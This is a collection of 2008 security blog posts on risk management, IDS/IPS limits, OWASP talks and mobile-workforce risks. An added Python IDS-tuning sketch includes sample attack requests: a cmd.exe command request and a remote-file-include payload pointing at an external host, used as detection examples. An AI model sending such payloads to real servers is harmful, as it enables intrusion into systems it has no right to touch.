Posted: 29 Sep 2008 07:31 AM CDT
Mitchell and I are joined this week by Bill Brenner. Bill is the senior editor at CSO Online. We have been trying to get him on as a guest since he was with searchsecurity.com! Bill talks mostly about how the current economic crisis might affect the security industry. We also talk about the life of a security journalist and what is the next big thing in security. The interview with Bill does not come on until around 17 minutes in. Mitchell and I first talk about a mess of things including Apple, Green NAC (but not Green Apples), M&A in security, etc. It's good to be doing these podcasts regularly again. Hope you enjoy it! If you have any questions, write to us at email@example.com.
Thanks to Pod0matic for hosting our podcast. Tonight's music is the usual, To the Summit by Jon Schmidt. You can hear more from Jon at http://www.jonschmidt.com. Music transitions between segments are by our own Mitchell Ashley!
Enjoy the podcast!
Posted: 29 Sep 2008 01:28 AM CDT
That skit "Jew or Not a Jew" on Saturday Night Live was hysterical. Tom Hanks was the guest host and he plays a game show host in a game where contestants guess whether a particular celebrity is Jewish or not. It is brought to you by Feldman's Pickles: "you don't have to be Jewish to like Feldman's, but it helps."
I feel the same way every football season. For whatever reason, my site must be highly listed when you search on whether Ben Roethlisberger is Jewish or not. I just can't believe that so many people actually take the time to search for this. It is always one of the top three search terms of visitors to the blog during football season. But if you have come to this article as a result of the search, let me say for sure: Ben Roethlisberger - Not a Jew!
To all of my Jewish friends who observe the holidays, Happy and Healthy New Year to you!
Posted: 28 Sep 2008 11:14 PM CDT
Posted: 28 Sep 2008 10:27 PM CDT
Posted: 28 Sep 2008 10:19 PM CDT
Posted: 28 Sep 2008 10:15 PM CDT
Posted: 28 Sep 2008 10:49 AM CDT
Came across a story today noting the Commonwealth of Virginia (and I bet you thought it was a state) was awarded top honors for information security by the National Association of State Chief Information Officers (NASCIO). It seems Virginia's "Interlocking Spheres of Collaborative Protection" program "strengthens the security of sensitive citizen information across all branches of government". I tried to find out a bit more about these interlocking spheres, but have not been able to find anything. I have dealt with some county governments in Virginia and will reach out to see if I can dig in a bit.
Overall, though, state and local governments face the same challenges that our federal government and many commercial entities do. Protecting confidential information is a challenge. But government also has to have some transparency and a duty to make certain information available. Balancing those two requirements is a difficult task.
State government IT departments have very much of a coop-a-tive relationship with each other. Each one wants to be the best at IT in general and security in particular. Yet, when one state is successful with a particular technology, many other states will seek to imitate that same technology or technique. I am sure that we will see other states adopt the Interlocking spheres program soon. No matter what it is exactly ;-)
Posted: 28 Sep 2008 10:01 AM CDT
Posted: 27 Sep 2008 05:32 PM CDT
In May of this year I sent an email to Peter MacKay, Canada’s Minister of National Defence, to enquire about Canada’s involvement in the NATO Cooperative Cyber Defence (CCD) Centre of Excellence (COE):
With Canada's long history of NATO involvement I would have thought Canada would have jumped at the opportunity to participate. If asked by my government I would have also jumped at the opportunity. Alas, my country does not want to be involved in this particular project:
This is truly a shame. This was an opportunity for Canada to participate in a NATO initiative that meant something more than large meetings and mass naval maneuvers in the Caribbean. For shame Canada…am I the only one who regards the proliferation of cyber attack capabilities as a threat to national security?
Posted: 27 Sep 2008 04:25 AM CDT
I read two blog pieces about IDS/IPS, here and here, and decided to throw a few comments into the blog discussions. This is just my point of view to the topic.
Alan noted that organizations are not using the IPS functionality and only monitor the traffic to detect events. I believe this is for the risk of blocking legitimate traffic that happens to trigger a signature, resulting in a false positive and possibly disrupting an important transaction.
He also noted that organizations do not update their signatures. I would say that in such cases they do not monitor and validate the events either; they just throw the box in a network location and leave it there running to do its "job". Too bad an IDS requires constant monitoring and updating, as it is signature-based like antivirus products. Either it is the "checkbox" culture or they do not know what to do, or they do not have the proper processes in place.
Ravi on the other hand noted that it is a difficult job to get the value out of IDS because of the sheer amount of events, that it is difficult to see through the noise. In my opinion that problem should be tackled with careful placement of the IDS and by tuning the IDS to suit the environment you're trying to monitor. Sure, you probably will miss a lot of attack related activity, but you will spot attacks that are specifically targeting the technologies you have. This is also where the placement of the box or boxes becomes important. What do you actually want to monitor? Do you benefit from the IDS in the first place?
As I already mentioned, you should have processes in place, more specifically management processes and incident response processes. One admin looking at the logs in the morning and afternoon is not enough; you actually need a team of guys monitoring the devices 24/7, and an actual response plan, if you want to benefit from the technology. The admin should just ensure the boxes are healthy and up-to-date.
What struck me the most in both of these blog posts was the mention of zero day attacks. You simply can't detect zero day attacks unless they have characteristics that get detected by an old signature. What they probably meant were the latest publicly announced vulnerabilities, for which vendors scramble to produce signatures if either the exploit exists or there are clear characteristics seen in a vulnerable service request or response.
Another point is that skillful attackers are able to evade IDS detection either by exploiting IDS caveats or by modifying the exploits to act in a slightly different way. Attack traffic can also look perfectly normal because the attacker is using normal operating system commands that are not considered suspicious. Many services also utilize encryption (HTTPS, SSH, anyone?), so the IDS is blind unless the encryption is off-loaded and the IDS positioned in a place where it has access to the cleartext data. In some cases not understanding this can lead to a false sense of security. This requires an organization to also monitor server logs and overall system integrity, and to have proper vulnerability management and hardening processes in place.
There is a lot more that simply can't be covered, but I end this blog post by saying that an IDS/IPS is not a silver bullet and should not be solely relied upon.
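As an added illustration (not part of the original post or of any IDS product), here is a small Python sketch of the tuning argument above: a signature hit is only worth an analyst's time when the technology it targets actually runs on the destination, and a sensor watching an encrypted port sees nothing unless TLS is terminated in front of it. The signatures, asset inventory and sample traffic are all constructed for the example.

```python
from collections import Counter
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Signature:
    sid: int
    name: str
    pattern: bytes     # substring matched against the cleartext payload
    target_tech: str   # technology the signature is only meaningful for


# Constructed, simplified signatures; not taken from any real ruleset.
SIGNATURES = [
    Signature(1001, "cmd.exe request", b"cmd.exe", "iis"),
    Signature(1002, "remote file include", b"=http://", "php"),
    Signature(1003, "manager console probe", b"/manager/html", "tomcat"),
]

# Constructed asset inventory: which technologies listen on each host:port.
# Tuning means telling the sensor what it is actually protecting.
INVENTORY = {
    ("10.0.0.5", 80): {"apache", "php"},
    ("10.0.0.7", 443): {"nginx", "php"},
}

# Ports carrying encrypted protocols the sensor cannot read without offload.
ENCRYPTED_PORTS = {443}


@dataclass(frozen=True)
class Event:
    dst: str
    dport: int
    payload: bytes
    decrypted: bool = False  # True if a TLS terminator fed the sensor cleartext


def classify(ev: Event) -> list[tuple[str, Optional[int]]]:
    """Return (verdict, sid) pairs for one event.

    'blind'      -> encrypted port and no offload: nothing can be matched
    'alert'      -> signature fired and its target technology is present
                    (or the host is unknown, so suppression is not safe)
    'suppressed' -> signature fired but the destination does not run that
                    technology: the noise a tuned sensor drops
    """
    if ev.dport in ENCRYPTED_PORTS and not ev.decrypted:
        return [("blind", None)]
    present = INVENTORY.get((ev.dst, ev.dport))  # None = host not inventoried
    results = []
    for sig in SIGNATURES:
        if sig.pattern not in ev.payload:
            continue
        if present is None or sig.target_tech in present:
            results.append(("alert", sig.sid))
        else:
            results.append(("suppressed", sig.sid))
    return results


def triage(events: list[Event]) -> Counter:
    """Count verdicts across a batch of events (the analyst's view)."""
    counts: Counter = Counter()
    for ev in events:
        for verdict, _ in classify(ev):
            counts[verdict] += 1
    return counts


# Constructed sample traffic (198.51.100.0/24 is a documentation range).
SAMPLE = [
    Event("10.0.0.5", 80, b"GET /scripts/cmd.exe?/c+dir HTTP/1.0"),
    Event("10.0.0.5", 80, b"GET /index.php?page=http://198.51.100.9/x.txt HTTP/1.1"),
    Event("10.0.0.7", 443, b"\x16\x03\x01\x00\x9c\x01\x00\x00\x98\x03\x03"),  # TLS record bytes
    Event("10.0.0.7", 443, b"GET /index.php?page=http://198.51.100.9/x.txt HTTP/1.1", decrypted=True),
    Event("10.0.0.42", 8080, b"GET /manager/html HTTP/1.1"),
]

if __name__ == "__main__":
    for ev in SAMPLE:
        print(ev.dst, ev.dport, classify(ev))
    print(triage(SAMPLE))
```

The same HTTPS request is invisible on port 443 until it is decrypted in front of the sensor, and the cmd.exe hit against a PHP host is dropped as noise, which is the tuning the post is asking for.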
Posted: 26 Sep 2008 08:51 PM CDT
Living in NYC has its perks, one being that we host the largest OWASP chapter across the world. The NY/NJ Metro chapter put a lot of effort into making sure this last week went smoothly, even with the change of venues at the last minute. I had a lot of fun, and it was nice seeing everyone again, and meeting new faces. On Wednesday night, a bunch of us gathered for a NYSec meeting at DBA down on 1st Ave and 2nd St. Some cool new people I got to meet included Andres Riancho, Dinis Cruz, Ryan Naraine, Ivan Ristić, Dave Aitel, RSnake, Chris Nickerson, and Gunnar Peterson… phew! That is not even a fraction of the people you get to see at these conferences.
Anyways, my two favorite talks go to Dinis Cruz and Dave Aitel. Firstly, Dinis is such an energetic guy, you just want to stand up, do the guido fist pump and then run off to do something really, really cool. As an independent contractor working for Ounce, Dinis developed an open source tool called o2 which helps code reviewers navigate mountains of static analysis data quickly and logically. Of the couple of static analysis tools I've come across, their interfaces don't exactly cater to performing thorough, quick and accurate analysis. What o2 lets you do is crank up the volume on these tools and just run with it, identifying patterns in code really easily, letting you cover as much as possible. I still have to spend some time playing with it, but it definitely would make anyone's job easier. All that, and it's open sourced and will read in any CIR data from an Ounce scan.
Dave’s talk, “Corruption” really captured my sentiments on non-webappsec research (present day). While in university, I always thought the barrier to entry prohibited a lot of people from becoming really good at writing reliable buffer overflow exploits. This could be seen as both good and bad, given the fact that many operating systems have randomized, non-executable memory stacks with Vista ASLR, XP SP2 DEP, PaX/Grsecurity, etc, making them somewhat immune to the vulnerability, but not 100% entirely. This presents a problem, a huge gaping vulnerability in both our systems and our thinking. Buffer overflows continue to surface even after being discovered 15 years ago. But because it is so hard, we don’t see many exploits on milw0rm or packetstorm. And let’s face it, if they’re not on there, then they don’t exist. Right? Maybe. Though one thing is certain, the people writing exploits are professionals and are really, really good at what they do. Be it Dino, Gobbles or Aitel (who was being modest when he said he’s not the best), it is true there are people out there who can and will do it, and when the next remotely exploitable buffer overflow that bypasses stack protection comes along, we won’t know what fucking hit us.
Also, we’ve begun to set the agenda for OWASP EU Summit Portugal. Arshan Dabirsiaghi is looking for folks to contribute to ISWG, a group with some modest goals, like fixing the Internet. Seriously though, the group is looking at new ways to secure the browser, and what approach(es) they’ll take to do it. I’d love to talk about some other projects, but really, there are just too many worthy projects to list all out here, so head on over to the OWASP EU Summit page, and find something of interest.
One last closing thought I’d like to squeeze in… Throughout the entire week, I found it really coincidental that ISC2 chose to sponsor the OWASP conference and release a new certification, the CSSLP (Certified Software Security Lifecycle Professional). Given that James McGovern is putting a lot of effort into developing an OWASP certification, Dre posting R.I.P. CISSP and getting in the top 5 Google search results for “CISSP”, I find it strangely odd they go and do this. It also seems as if they put no thought into the certification at all, just one they cranked out to beat OWASP “to the punch” and make a buck at the industry’s expense, laughing all the way to the bank. Shameful.
Posted: 26 Sep 2008 12:57 PM CDT
For those of you who haven't heard already, friend of the show Michael Santarcangelo (The Security Catalyst) had his mobile home robbed while he's on a US tour with his family, taking his security messages on the road. The thieves made off with his computing gear. I have to say that he's been very upfront about his predicament so that we can all learn from his situation; he did lose some data, but for the most part his backup and disaster recovery plan went well. He's deriving a great amount of inspiration for some more security training out of this as well. I have to applaud him on taking some lemons and making lemonade.
I have to admit that the incident has inspired me as well. It got me thinking about some possible issues with mobile workforces. I mean, we all (for the most part) do a pretty good job of securing our assets while they are in our corporate environment: whole disk encryption, AV, desktop and network firewalls...the list goes on. We also have those locked doors, a security guard, alarm system and so forth.
But what happens when someone takes (with permission) that asset, such as a laptop, home to do some work in the evenings, work from home, or visit client sites? What do the employees have for protection? Do they have a network firewall, or do they plug directly in to their cable modem? Do they have a security guard (dog or alarm system at that)? Typically no. Unsecured wireless? Yikes, all of the same things that we've thought about as challenges in the corporate environment, we have to think about "on the road". I see these as some potential issues for security for both data on the machine, as well as a possible connection to the corporate network.
Let's set the scene. Intellectual property gets loaded on to a laptop with full disk encryption. The employee takes the laptop home to telecommute (which is a regular occurrence), connects the laptop to the home network and initiates the VPN connection (with cached VPN credentials possibly) to the corporate network. The employee decides to take a breath of fresh air with a trip to the local coffee shop for an invigorating mocha-chino. While away from home, a burglar (or attacker in this case) breaks in and has a few minutes to play on the VPN, and so forth. Without full disk encryption, this situation looks like a disaster to me.
So, you are asking, how does the attacker find where the "target" lives to break in? A little Google searching (and maybe even some Maltego action), could turn up a photo sharing service account for the "target". Combine that with a Nokia N95 or iPhone with firmware 2.0 or later, and some nice, geotagged photos get uploaded (such as the one to the right, with output from a nice Firefox greasemonkey script to pull map info from google). Now you know where to search...
Protect your corporate assets on the move! It is hard to make unreasonable requirements of folks at home, so a little education needs to go a long way. Make those corporate assets as secure as possible, and design a policy framework that will appropriately guard against the high risk areas; include screen saver locking with a short delay, workstation login timeouts, whole disk encryption, VPN activity timeouts and maybe even a good cable lock for good measure, amongst a myriad of other things.
Educate staff about what they share on the internet; in most cases it would be in bad form to restrict what folks do in their spare time.
Best of luck securing your mobile workforce, and Michael, best of luck to you and your family recovering from your ordeal.
- Larry "haxorthematrix" Pesce
Posted: 26 Sep 2008 09:08 AM CDT
Posted: 26 Sep 2008 07:56 AM CDT
We’re frequently asked what we’re reading and what we like in blog posts, so here are some interesting things that hit our RSS readers that you may have missed:
Interesting stuff that. A detailed mapping might help some folks. Either way, the good news for those keen on understanding risk management is that governance metrics, done right, allow us to understand a part of that “capability to manage risk” we’re always looking for. Assurance, verification and the acquisition and interpretation of knowledge is king. Speaking of which….
Good analysis is all about the uncertainty. Speaking of accounting for uncertainty…
And there’s the trick. We might call “abstraction assurance” an analog to “confidence” or “uncertainty” in certain priors (metrics) or posteriors (calculated values based on those metrics). The stronger that abstraction assurance is, the less uncertainty we have in our knowledge and the better our ability to create wisdom from that knowledge (you know, make decisions).
Adam’s focus is on software security, but the discussion here can be abstracted out into the broader realm of risk management quite nicely.
The US DoJ says that in 2005 (there’s some timely data) 2/3 of their surveyed firms detected at least one cybercrime. “Cybercrime” is “classified … into cyber attacks, cyber theft, and other incidents.” Pretty general. Also from the report: “Computer viruses made up more than half of all cyber attacks.”
(That sound you hear is me tapping my forehead lightly on a large iron object)
Posted: 25 Sep 2008 08:08 PM CDT
Posted: 25 Sep 2008 02:29 PM CDT
Posted: 25 Sep 2008 01:15 PM CDT
We're doing things a little different tonight. We'll be breaking this show up into two parts.
The live stream for the news portion of the show should be active about 5:00 PM EDT, Thursday, September 25th. We should begin recording the live show at about 5:10 PM EDT.
We even have a very special guest again this week, Alex Horan from Core Security Technologies (and some other distinguished guests from Core). The stream should be live at about 8:45 PM EDT and we'll begin the interview at about 9:00 PM EDT.
Please keep in mind that these times are all estimates, but we will try to do the best that we can.
Don't forget to join in on the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
Please join us, and thanks for listening!
- Larry & Paul
Posted: 25 Sep 2008 10:54 AM CDT
The US PCI Conference is now over, and what a quick two days. There are many changes coming for the new standard, and I'm very excited about talking to you all. We are putting together a webinar to discuss, in detail, the changes that you will be facing. Look for an announcement on that soon.
It was great talking with many of you about the issues that we all face every day. I look forward to talking again soon and helping you build creative solutions to these challenges.
Oh, and a quick tidbit for you all. If you get a business card from a processor, sometimes even when you put it in a blazing fire pit, it will not burn!
Posted: 25 Sep 2008 10:51 AM CDT
I was interviewed yesterday morning for WNIN 88.3 FM in Evansville to talk about how Sarah Palin’s account got hacked and how it affects the average user. I thought the interview went well and I didn’t sound like too much of an idiot. You can listen for yourself, it’s now been published as part of the third episode of Plugged In, the podcast that accompanies the radio show.
Posted: 25 Sep 2008 09:43 AM CDT
In part one we talked about some of the mistakes that companies make when it comes to risk management. In this post we will focus on some of the items that a company can do to improve their risk management programs. What I will lay out are three points/characteristics/aspects that a solid risk management program must have in order to be effective.
Point One: A common risk framework must exist throughout the organization, not just within one department. This framework must:
· Use a common definition for "risk;"
· Support appropriate standards, regulations, guidelines;
· Clearly define the key roles, responsibilities, and authority relating to risk management;
· Support all of the business units and functions both in the way that these units accomplish their jobs as well as in the performance of their risk responsibilities.
Many organizations recognize that risk means "the chance of something going wrong, hazard, statistical odds of danger" to quote the Encarta Dictionary. What they forget is that there are positive aspects to risk. Risk can be seen as the opportunity to create and preserve value.
When I think of risk in this way an old saying comes to mind:
"When Life gives you Lemons, make Lemonade."
In other words you need to create opportunity out of adversity. Business is about risk. There is no way to avoid it, so why simply seek to nullify its effects when you can leverage it to gain an advantage? In my experience, the companies that embrace this concept of managing risk succeed not only in risk management but in the marketplace itself.
Point Two: Senior management must have the primary responsibility for the risk management program. This means its design (it must be appropriate for the whole organization), its implementation (it must not favor one unit or function over another), and its ongoing operation. Most importantly senior management must have complete visibility into how the organization (and each of its constituent components/units) manages risk.
This means that risk must be coordinated across the entire organization. Risk must be everyone's responsibility, even for those people who do not think they have any responsibilities with regard to risk. True, implementing technical security controls may be the primary responsibility of the IT department, but in order for that implementation to be successful all departments and functions must share the responsibility. IT needs to know if a particular control causes too much interference with the way the business is run so that they can make adjustments or implement alternative controls to reduce interference to a minimum. The other departments and functions must realize that there are valid business reasons that these controls must be implemented.
Senior management needs to send the message that risk is a collective concern. In order to do so, senior management needs to ensure that they communicate clearly and effectively. They need to nurture a culture focused on risk (how to manage it and overcome it for the organization's benefit). They need to institute a rewards program to provide positive reinforcement, and they need to institute an effective learning program to educate everyone on what parts they play in the grand scheme of things.
Point Three: Risk is an everyday concern and on every agenda, not just on certain scheduled meetings. Each business unit/function is responsible not only for the performance of its business but also for the management of the risks it takes. This is important because it speaks to ownership and accountability.
Not everyone is going to like this. Honestly they don't have to, but they do have to climb on board and support the effort. It is analogous to having to abide by the covenants in your homeowners association. If you move into a neighborhood with a homeowners association, then you agree to abide by the rules that the association agrees upon. If you don't want to do that then there are other homes that are not part of associations, just as there are other companies to work in. (Of course there are always rules set forth by the local, state, and national government that we must abide by; that is part of living in an ordered society.)
Now not all business units or functions have the same scope when it comes to risk. Some departments "own" risk management because they are the profit generating arms of the organization, and other departments (such as HR, IT, finance, legal, etc.) support these profit generating arms. These supporting functions own the risk that arises out of their own area of responsibility in addition to sharing in the overall responsibility of supporting the overall organization. It is very important (to harken back to Point One) that these functions have well-defined, articulated roles within the overall risk management program. They must participate in risk discussions even when it is not clear that these discussions are directly related to them.
I could go on but this post is getting a bit long already. To sum everything up – risk is everyone's responsibility. Companies trade risk for reward daily so it shouldn't be too large a leap to remind ourselves that the risks we face on a daily basis need not only be seen as a drag on the balance sheet. They can be seen as opportunities to be leveraged. Instituting a risk management program that pays attention to the three points that I have made above will do just that.